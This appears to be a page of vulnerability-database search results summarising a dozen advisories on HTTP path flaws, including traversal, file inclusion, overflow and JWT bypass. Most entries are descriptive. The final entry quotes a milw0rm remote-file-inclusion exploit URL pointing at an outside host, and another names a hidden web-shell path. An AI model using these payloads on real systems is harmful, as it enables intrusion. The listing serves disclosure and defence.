
52 matches found

OSV
added 2021/08/10 8:15 p.m., 1 view

CVE-2021-29296

Null Pointer Dereference vulnerability in D-Link DIR-825 2.10b02, which could let a remote malicious user cause a denial of service. The vulnerability could be triggered by sending an HTTP request with URL /vctwan; the sbin/httpd would invoke the strchr function and take NULL as a first argument,...

CVSS 7.5, AI score 7.1, EPSS 0.00263
Exploits: 0, References: 2
RedHat Linux
added 2020/02/12 6:39 a.m., 2 views

istio: unauthorised access to JWT protected HTTP path

An unauthorized access vulnerability was found in Istio in the servicemesh-proxy. An attacker can use this flaw to specify an HTTP path and gain unauthorized access, even if the path is configured to only be accessed with a valid JSON Web Token (JWT)...

CVSS 7.5, AI score 7.3, EPSS 0.0106
Exploits: 1, References: 5
RedhatCVE
added 2020/02/11 8:38 p.m., 18 views

CVE-2020-8595

An unauthorized access vulnerability was found in Istio in the servicemesh-proxy. An attacker can use this flaw to specify an HTTP path and gain unauthorized access, even if the path is configured to only be accessed with a valid JSON Web Token (JWT). Mitigation: Depending on the paths used in the...

CVSS 7.5, AI score 0.6, EPSS 0.0106
Exploits: 1, References: 4
Talos
added 2019/05/13 12:00 a.m., 418 views

Anker Roav A1 Dashcam HTTP Path Overflow Code Execution Vulnerability

Summary: An exploitable code execution vulnerability exists in the URL-parsing functionality of the Roav A1 Dashcam running version “RoavA1SWV1.9.” A specially crafted packet can cause a stack-based buffer overflow, resulting in code execution. An attacker can send a packet to trigger this...

CVSS 8.8, AI score 8.3, EPSS 0.00239
Exploits: 0
CNVD
added 2018/11/21 12:00 a.m., 2 views

TP-Link TL-R600VPN HTTP Path Traversal Vulnerability

The TP-Link TL-R600VPN is an enterprise router from China P&L TP-LINK. A path traversal vulnerability exists in the HTTP server feature in TP-Link TL-R600VPN HWv3 FRNv1.3.0 and HWv2 FRNv1.2.3 versions. An attacker can exploit the vulnerability to disclose sensitive system files with the help of a...

CVSS 7.5, AI score 7.4, EPSS 0.23382
Exploits: 1, References: 1
OSV
added 2018/04/13 4:29 p.m., 1 view

CVE-2018-6547

playsservice.exe in the plays.tv service before 1.27.7.0, as distributed in AMD driver-installation packages and Gaming Evolved products, contains an HTTP message parsing function that takes a user-defined path and writes non-user controlled data as SYSTEM to the file when the extractfiles...

CVSS 9.1, AI score 5.8, EPSS 0.00493
Exploits: 0, References: 1
Prion
added 2017/12/20 10:29 p.m., 17 views

Path traversal

In versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware, an undocumented, root-privilege administration web shell is available using the HTTP path https:///adm/syscmd.asp...

CVSS 9, AI score 8.7, EPSS 0.6634
Exploits: 2, References: 1, Affected Software: 5
NVD
added 2017/12/20 10:29 p.m., 15 views

CVE-2017-5259

In versions 4.3.2-R4 and prior of Cambium Networks cnPilot firmware, an undocumented, root-privilege administration web shell is available using the HTTP path https:///adm/syscmd.asp...

CVSS 9, AI score 8.8, EPSS 0.6634
Exploits: 2, References: 1
OSV
added 2016/09/12 10:59 a.m., 2 views

CVE-2016-6370

Directory traversal vulnerability in the web interface in Cisco Hosted Collaboration Mediation Fulfillment HCM-F 10.63 and earlier allows remote authenticated users to read arbitrary files via a crafted pathname in an HTTP request, aka Bug ID CSCuz27255...

CVSS 4.3, AI score 5.9, EPSS 0.00543
Exploits: 0, References: 3
Check Point Advisories
added 2015/07/12 12:00 a.m., 4 views

LANDesk Management Suite Remote File Inclusion (CVE-2014-5362)

A remote file inclusion vulnerability has been reported in LANDesk Management Suite. The vulnerability is due to insufficient input validation in the HTTP path. A remote attacker could exploit the remote file inclusion vulnerability by enticing a user to click on a link with a malicious parameter...

CVSS 6.5, AI score 6.7, EPSS 0.03788
Exploits: 4
seebug.org
added 2014/07/01 12:00 a.m., 20 views

FrontPage 98/Personal WebServer 1.0,Personal Web Server 2.0 htimage.exe File Existence Disclosure

No description provided by source. source: http://www.securityfocus.com/bid/1141/info htimage.exe can be used to determine if a specified path and filename exists on the target host or not. The specified path must be on the same logical drive as the web content. Any file can be specified as an...

AI score 7.1
Exploits: 0
seebug.org
added 2006/09/06 12:00 a.m., 11 views

Beautifier 0.1 (Core.php) Remote File Include Vulnerability

No description provided by source. Beautifier v0.1 Remote File Inclusion Vulnerability Download: http://www.beautifier.org/php/beautifier-php-full-current.tar.gz Found By: the master exploit: http://Target/Path/Beautifier/Core.php?BEAUTPATH=http://cmd.gif? milw0rm.com 2006-09-06...

AI score 7.1
Exploits: 0